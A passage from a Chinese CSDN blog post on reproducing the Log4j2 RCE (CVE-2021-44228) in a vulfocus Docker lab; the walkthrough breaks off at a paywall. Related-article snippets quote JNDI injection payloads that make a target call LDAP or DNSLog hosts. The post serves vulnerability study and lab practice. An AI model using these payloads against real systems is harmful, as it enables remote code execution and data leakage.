log4j2 RCE漏洞复现

已于 2023-12-28 11:28:23 修改
阅读量541 收藏 10
点赞数 7
分类专栏: web安全 文章标签: log4j 网络安全 安全 网络 web安全
于 2023-12-28 10:06:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53303754/article/details/135261504
版权
本文详细描述了如何在Docker中复现Log4j2安全漏洞,通过一步步操作,包括下载镜像、启动服务、创建临时域名和构建PoC,最终成功验证了漏洞的存在。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本次log4j2漏洞复现,基于docker进行环境搭建,进而漏洞验证!

docker搜索log4j2信息:

docker search log4j2

在这里插入图片描述

下载log4j2镜像:

docker pull vulfocus/log4j2-rce-2021-12-09

(我们选择vulfocus/log4j2-rce-2021-12-09进行验证)

请添加图片描述

启动log4j2镜像:

docker run -itd -p 8080:8080 vulfocus/log4j2-rce-2021-12-09

请添加图片描述

浏览器登录:

请添加图片描述

点击????? 得到ok,显示payload=111

最低0.47元/天 解锁文章
log4j2-rce漏洞复现(CVE-2021-44228)
Z_l123的博客
04-01 2338
漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.22.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭建并启动靶场 DNSLog验证 通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6918
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
Apache Log4j2 RCE漏洞复现
huangyongkang666的博客
04-13 2106
Apache Log4j2 RCE漏洞复现 1.漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j 2.x<=2.15.0.rc1 漏洞编号:CVE-2021-44228 2.漏洞环境搭建 目标:Ubuntu ip: 192.168.241.129 攻击机 :kail ip: 192.168.241.128 由于我的Ubuntu虚拟机已经搭建过docker,直接用以下命令
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 1451
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现21年席卷整个安全圈的log4j2漏洞log4jjavaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 1006
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
log4j2 RCE漏洞复现(1)
最新发布
2401_84300859的博客
05-17 595
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Log4j2 RCE 简单复现
ChamZhiZe的博客
01-10 727
一:所以环境 java 1.8.0_u172+idea 注:高版本java不行,最好是在java1.8.0_u140以前的版本复现。 二:复现过程 github上下载本次复现所需要的东西: 第一步 你需要知道你的IP地址,因为是本地复现,所以就是你本地的物理机IP,也可以是你服务器的IP地址,总之一定是自己的IP地址。你要是做一些坏事儿,铁手镯会带到你的手腕上,请你到里面喝喝茶。 第二步 开启你的LDAP服务,在文件加的POC文件夹下,通过cmd启动你的LDAP服务 java -jar JNDIExp
Log4j2_RCE漏洞复现
kukudeshuo的博客
12-20 1902
Log4j2_RCE漏洞复现 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html 复现过程 首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具 打开题目 先使用dnslog进行测试 ${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp} 填在账号输入的位置即可,密码随便填 然后点击提交 可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞 开启ldap和http服务
Log4j远程执行RCE复现GET和POST
qq_30947463的博客
05-04 1242
从安装docker和vulfocus到漏洞复现
log4j2 RCE漏洞复现(1),2024年大厂网络安全面经
m0_60453176的博客
04-08 452
下载log4j2镜像:(我们选择vulfocus/log4j2-rce-2021-12-09进行验证)启动log4j2镜像:浏览器登录:点击?????得到ok,显示payload=111创建临时域名:2oaj3e.dnslog.cn。
vulfocus复现log4j2-rce-2021-12-09
qq_22132931的博客
12-26 955
vulfocus复现log4j2-rce-2021-12-09
log4j2-rce-2021-12-09漏洞原理及复现
加油~
07-28 1521
${jndi:ldap://${6666}.6666.dnslog.cn}你懂得~
log4j RCE漏洞原理分析及检测_log4j 漏洞监测(1),【一步教学,一步到位
weixin_58085973的博客
04-18 658
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
ApacheLog4j2.xRCE漏洞修复步骤(CVE-2021-44228)
薄炙厚词的博客
08-24 870
Apache log4j2.x版本rce漏洞修复方法
Log4j2远程命令执行复现CVE-2021-12-09】
qq_55213436的博客
03-21 604
Log4j2是基于log4j这个java日志处理组件进行二次开发和改进而来的。也是目前最常用的日志框架之一,在之前的博客中()我们阐述了漏洞的原理和大致的利用方法。今天就借助dockers拉取vulfocus上的漏洞环境进行漏洞复现和利用的介绍。
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 764
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.22.12.3 和 2.3
【实战】一次简单的log4j漏洞测试
crowsec
12-19 4140
【实战】一次简单的log4j漏洞测试
Log4j2安全漏洞复现及解决
此文档似乎是在尝试复现Log4j2的一个特定版本()中的bug,这通常指的是CVE-2021-44228,也被称为“Log4Shell”漏洞。这是一个远程代码执行(RCE漏洞,允许攻击者通过操纵日志记录输入来注入并执行恶意代码。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值